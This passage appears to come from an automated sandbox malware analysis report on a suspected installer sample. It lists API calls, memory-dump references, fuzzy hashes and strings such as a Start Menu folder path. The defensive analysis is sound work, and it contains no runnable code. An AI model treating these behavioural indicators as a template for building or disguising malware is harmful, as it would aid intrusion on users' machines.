                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: Open
                                            • String ID:
                                            • API String ID: 71445658-0
                                            • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                            • Instruction ID: 4278cf0171cf0b678593f71500b3925c4415a8e9ce87015ff7d519d2eb21bae6
                                            • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                            • Instruction Fuzzy Hash: BCD0123204020DBBDF119E90AD01FAB3B1DEB48350F014826FE07A8091D775D570A724
                                            APIs
                                            • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015CD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: ad2c1245eb71982fcc6b079eee79e7d617a05ea2d30047a0a3aab57077eeae64
                                            • Instruction ID: 7d2cdf6a56bb8b2c4d8e447006d96498fe5724c9cded2cbb68f68f822827988b
                                            • Opcode Fuzzy Hash: ad2c1245eb71982fcc6b079eee79e7d617a05ea2d30047a0a3aab57077eeae64
                                            • Instruction Fuzzy Hash: BED01732708214DBDF60DBA8AF08A9FB3A4AB10328B20413BD211F21D1D6B9C5469B2D
                                            APIs
                                            • SendMessageA.USER32(00010456,00000000,00000000,00000000), ref: 0040438B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: a0eb0ef1ff6dd579934d65901b95a1f3a9c939147581cb3b9152e9d48dc718fa
                                            • Instruction ID: f513ac05e70e3adf76b651c0ca8ec4e95b66ff2fdc1b64d79a05bcbbe3c40a95
                                            • Opcode Fuzzy Hash: a0eb0ef1ff6dd579934d65901b95a1f3a9c939147581cb3b9152e9d48dc718fa
                                            • Instruction Fuzzy Hash: 4DC09BB17403027BFE209B529E45F077798D790700F1554397754F54D0C774D410D62C
                                            APIs
                                            • SendMessageA.USER32(00000028,?,00000001,00404192), ref: 00404370
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: f6c8117e81de0903b802e48e7999fd2a70a6c35278de0d39013be8dd7138c214
                                            • Instruction ID: 50a7fc5ec129452a525cde7c4fd9a9aa290cced010421ab9f43a5acdc6dad314
                                            • Opcode Fuzzy Hash: f6c8117e81de0903b802e48e7999fd2a70a6c35278de0d39013be8dd7138c214
                                            • Instruction Fuzzy Hash: 33B0127A781601BBDE615B40DF09F457EB2E768701F408039B348240F0CEB200A9DB2C
                                            APIs
                                            • ShellExecuteExA.SHELL32(?,00404774,?), ref: 00405978
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: ExecuteShell
                                            • String ID:
                                            • API String ID: 587946157-0
                                            • Opcode ID: fbdde1e211bf9c759df7b0f81bfbcb60f8cdccf4e78a0d8a998f91d13d5c86f6
                                            • Instruction ID: 923d99ad9cc7c2cd2e65252a1a37f78a8d30594c4c7a615bb4925eb6a4e84790
                                            • Opcode Fuzzy Hash: fbdde1e211bf9c759df7b0f81bfbcb60f8cdccf4e78a0d8a998f91d13d5c86f6
                                            • Instruction Fuzzy Hash: 27C092B2000200DFE301CF90CB08F067BF8AF54306F028068E184DA060C7788840CB29
                                            APIs
                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004030F6,?,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 0040339E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: FilePointer
                                            • String ID:
                                            • API String ID: 973152223-0
                                            • Opcode ID: bee48198ef0a4de3628cda0e050061df99a752697c0ad5ddba35b49727997b0c
                                            • Instruction ID: 699dda5fb03a211c19396a68767747e6c986426da1756d7c47186a7ffa8d2f84
                                            • Opcode Fuzzy Hash: bee48198ef0a4de3628cda0e050061df99a752697c0ad5ddba35b49727997b0c
                                            • Instruction Fuzzy Hash: EBB01231140300BFDA214F00DF09F057B21AB94710F10C034B384780F086711075EB0E
                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(?,0040412B), ref: 00404359
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            • Opcode ID: b7efc8905e9f2a5b3d5d2c2477723ee0501502072c4fff85560e1a7fdf79de64
                                            • Instruction ID: b84ed7fd3cc5f3c3e9fcd53eb4babc11f88d3e7fa425116ebe2a9639eb74f9e6
                                            • Opcode Fuzzy Hash: b7efc8905e9f2a5b3d5d2c2477723ee0501502072c4fff85560e1a7fdf79de64
                                            • Instruction Fuzzy Hash: 28A00176505500AFCA12AB50EF1980ABB66ABA4741B818479A685601358B768831EB1B
                                            APIs
                                              • Part of subcall function 004053D1: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dll,00000000,00424440,76D523A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                              • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dll,00000000,00424440,76D523A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                              • Part of subcall function 004053D1: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dll,004032C3,004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dll,00000000,00424440,76D523A0), ref: 0040542D
                                              • Part of subcall function 004053D1: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dll), ref: 0040543F
                                              • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                              • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                              • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                              • Part of subcall function 00405926: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042BC90,00431800,00431800,00431800,?,00431400,00000000), ref: 0040594F
                                              • Part of subcall function 00405926: CloseHandle.KERNEL32(?), ref: 0040595C
                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FE5
                                              • Part of subcall function 0040672A: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040673B
                                              • Part of subcall function 0040672A: GetExitCodeProcess.KERNEL32(?,?), ref: 0040675D
                                              • Part of subcall function 004061EB: wsprintfA.USER32 ref: 004061F8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                            • String ID:
                                            • API String ID: 2972824698-0
                                            • Opcode ID: 1750d852ef655aad6943f12ff86d7c5be13c4aa94793d558f94d59855ccbac7d
                                            • Instruction ID: 2907458289dc89520fdc1db2e5a40f60bb15031deda838765eaf0f6b46983df9
                                            • Opcode Fuzzy Hash: 1750d852ef655aad6943f12ff86d7c5be13c4aa94793d558f94d59855ccbac7d
                                            • Instruction Fuzzy Hash: 0EF05B31905112DBCF20ABA55D849EF71E4DB0135CB11413FF501F21D2D7BC4A46DAAE
                                            APIs
                                            • Sleep.KERNELBASE(00000000), ref: 004014E9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: Sleep
                                            • String ID:
                                            • API String ID: 3472027048-0
                                            • Opcode ID: 1086b86eff6ccb0646e334d3d3a43b9eec11b9d4dc04b4a1abbda41f1d779818
                                            • Instruction ID: 2b610f9d6ca2559d84a6cccd890523da06de060bf9d54f72eb9b50da0c514afd
                                            • Opcode Fuzzy Hash: 1086b86eff6ccb0646e334d3d3a43b9eec11b9d4dc04b4a1abbda41f1d779818
                                            • Instruction Fuzzy Hash: 1CD05E73B142009BDB60DBB8BEC445F73E4E7403257304837E502E2092E5788946861C
                                            APIs
                                            • GlobalAlloc.KERNELBASE(00000040,6D0E12C3,?,6D0E135F,-6D0E504B,6D0E11C0,-000000A0), ref: 6D0E12AD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1269749952.000000006D0E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D0E0000, based on PE: true
                                            • Associated: 00000000.00000002.1269707159.000000006D0E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000000.00000002.1269794266.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000000.00000002.1269831918.000000006D0E6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6d0e0000_004552024107.jbxd
                                            Similarity
                                            • API ID: AllocGlobal
                                            • String ID:
                                            • API String ID: 3761449716-0
                                            • Opcode ID: ed15be0b11603c3199212a51e353e3094837193e848b20318c4966e04d6ef975
                                            • Instruction ID: d0b085a3f675890b1271ea6fe8b2f27e388a7dc59da181d984c773dbbc7cb8ff
                                            • Opcode Fuzzy Hash: ed15be0b11603c3199212a51e353e3094837193e848b20318c4966e04d6ef975
                                            • Instruction Fuzzy Hash: EFA00275540100EBDE915BD0E90EF1C3B32B74AF01F104850F305550D497758110DF65
                                            APIs
                                            • GetDlgItem.USER32(?,000003FB), ref: 0040480E
                                            • SetWindowTextA.USER32(00000000,?), ref: 00404838
                                            • SHBrowseForFolderA.SHELL32(?,00429860,?), ref: 004048E9
                                            • CoTaskMemFree.OLE32(00000000), ref: 004048F4
                                            • lstrcmpiA.KERNEL32(Call,0042A488), ref: 00404926
                                            • lstrcatA.KERNEL32(?,Call), ref: 00404932
                                            • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404944
                                              • Part of subcall function 00405987: GetDlgItemTextA.USER32(?,?,00000400,0040497B), ref: 0040599A
                                              • Part of subcall function 00406587: CharNextA.USER32(0000000C,*?|<>/":,00000000,?,76D53410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\004552024107.bat.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065DF
                                              • Part of subcall function 00406587: CharNextA.USER32(0000000C,0000000C,0000000C,00000000,?,76D53410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\004552024107.bat.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065EC
                                              • Part of subcall function 00406587: CharNextA.USER32(0000000C,?,76D53410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\004552024107.bat.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065F1
                                              • Part of subcall function 00406587: CharPrevA.USER32(0000000C,0000000C,76D53410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\004552024107.bat.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00406601
                                            • GetDiskFreeSpaceA.KERNEL32(00429458,?,?,0000040F,?,00429458,00429458,?,00000001,00429458,?,?,000003FB,?), ref: 00404A02
                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A1D
                                              • Part of subcall function 00404B76: lstrlenA.KERNEL32(0042A488,0042A488,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A91,000000DF,00000000,00000400,?), ref: 00404C14
                                              • Part of subcall function 00404B76: wsprintfA.USER32 ref: 00404C1C
                                              • Part of subcall function 00404B76: SetDlgItemTextA.USER32(?,0042A488), ref: 00404C2F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: 79~$A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes$Call
                                            • API String ID: 2624150263-648501161
                                            • Opcode ID: 0a9a22de57e54a42c41f7f9c473854a5632b4b75f318642da20d5b1a73d2513c
                                            • Instruction ID: f53f9ae5ebeaccab956e1b2ad526c51027fc30446c854342799b5ba7b8d0bc76
                                            • Opcode Fuzzy Hash: 0a9a22de57e54a42c41f7f9c473854a5632b4b75f318642da20d5b1a73d2513c
                                            • Instruction Fuzzy Hash: BAA172F1A00209ABDB11AFA5CD45AAF76B8EF84314F14807BF611B62D1D77C89418F6D
                                            APIs
                                            • CoCreateInstance.OLE32(0040851C,?,00000001,0040850C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040221D
                                            • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,0040850C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022CF
                                            Strings
                                            • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Branchiostomidae11, xrefs: 0040225D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: ByteCharCreateInstanceMultiWide
                                            • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Branchiostomidae11
                                            • API String ID: 123533781-67800706
                                            • Opcode ID: 26e4af273d4ad834d7dd4ca4c27adc144b69110a5e0929a66cb48c7bfc0a4cbf
                                            • Instruction ID: 9693176738af107330769ac86e8646dde0b712c02a361864b0ed1875b7ced88a
                                            • Opcode Fuzzy Hash: 26e4af273d4ad834d7dd4ca4c27adc144b69110a5e0929a66cb48c7bfc0a4cbf
                                            • Instruction Fuzzy Hash: DB511971A00208AFDF00EFA4CA88A9D7BB5FF48314F2045BAF505FB2D1DA799981CB54
                                            APIs
                                            • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027DE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: FileFindFirst
                                            • String ID:
                                            • API String ID: 1974802433-0
                                            • Opcode ID: 930922f26d5cdd011eb09c6a8250f7f43846b17323c9774391e4e916de6dacb1
                                            • Instruction ID: 474e59c826447b87e47a37c01b73ad662870a85b7ff57bc711f4e8679485c19e
                                            • Opcode Fuzzy Hash: 930922f26d5cdd011eb09c6a8250f7f43846b17323c9774391e4e916de6dacb1
                                            • Instruction Fuzzy Hash: 9CF0A771605110DFDB51EBA49E49AEE77689F21314F6005BBE141F20C2C6B889469B2E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: aa1aee8a5b3a43351eb0af44d038224c2164fb65a2c69693e5a9d071f73749d8
                                            • Instruction ID: 8768c5d39ca9d5d04b1d74764d0b3cf6a08d2071900a395e822ff8491b177041
                                            • Opcode Fuzzy Hash: aa1aee8a5b3a43351eb0af44d038224c2164fb65a2c69693e5a9d071f73749d8
